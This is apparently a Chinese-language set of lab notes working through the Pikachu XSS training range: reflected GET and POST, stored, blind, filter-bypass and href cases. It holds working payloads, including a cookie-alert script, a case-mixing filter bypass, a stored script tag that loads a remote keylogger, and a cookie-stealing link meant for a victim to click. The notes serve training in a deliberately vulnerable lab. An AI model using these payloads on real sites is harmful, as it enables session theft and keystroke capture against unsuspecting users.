1.反射型xss
输入kobe点submit发现url为http://127.0.0.1/pikachu/vul/xss/xss_reflected_get.php?message=kobe&submit=submit,于是确定get传参的反射性
测试将kobe改为js <script>alert(document.cookie)</script>,成功弹窗,说明xss无绕过
2.反射型xss(post)
输入用户密码后发现url无变化,于是确定为post传参的反射型xss
输入admin,123456登陆看到这个界面
利用实验思路,修改一下攻击者与服务器的地址
http://192.168.171.129/pikachu/pkxss/xcookie/post.html
我们只需要诱导受害者点击上面的链接就能窃取用户的Cookie
3.存储型xss
存储型XSS和反射型XSS形成的原因是一样的,不同的是存储型XSS下攻击者的可以将脚本注入到后台存储起来,构成更加持久的危害
直接提交语句构造payload就能成功
<script>alert("xss")</script>
键盘记录
我们需要去嵌入一个能够调用我们的远程js的方法,放一段代码进去。点提交后,这个js就被嵌入到这个页面中了。<script src="http://127.0.0.1/pkxss/rkeypress/rk.js"></script>
在页面上随便输入一个键盘,他会显示页面请求失败
重新打开xss的存储页面
我们随便输入几个数字,会发现js能把我们的输入全都抓下
4.盲打
登陆后台(admin 123456)一登陆就发现
5.xss过滤
加符号探测:"'<>/
输入<script>alert('xss')</script>
script被过滤了
再用<sCRipt>alert('xss')</sCRipt>进行试
成功
6.herf输出
尝试js转移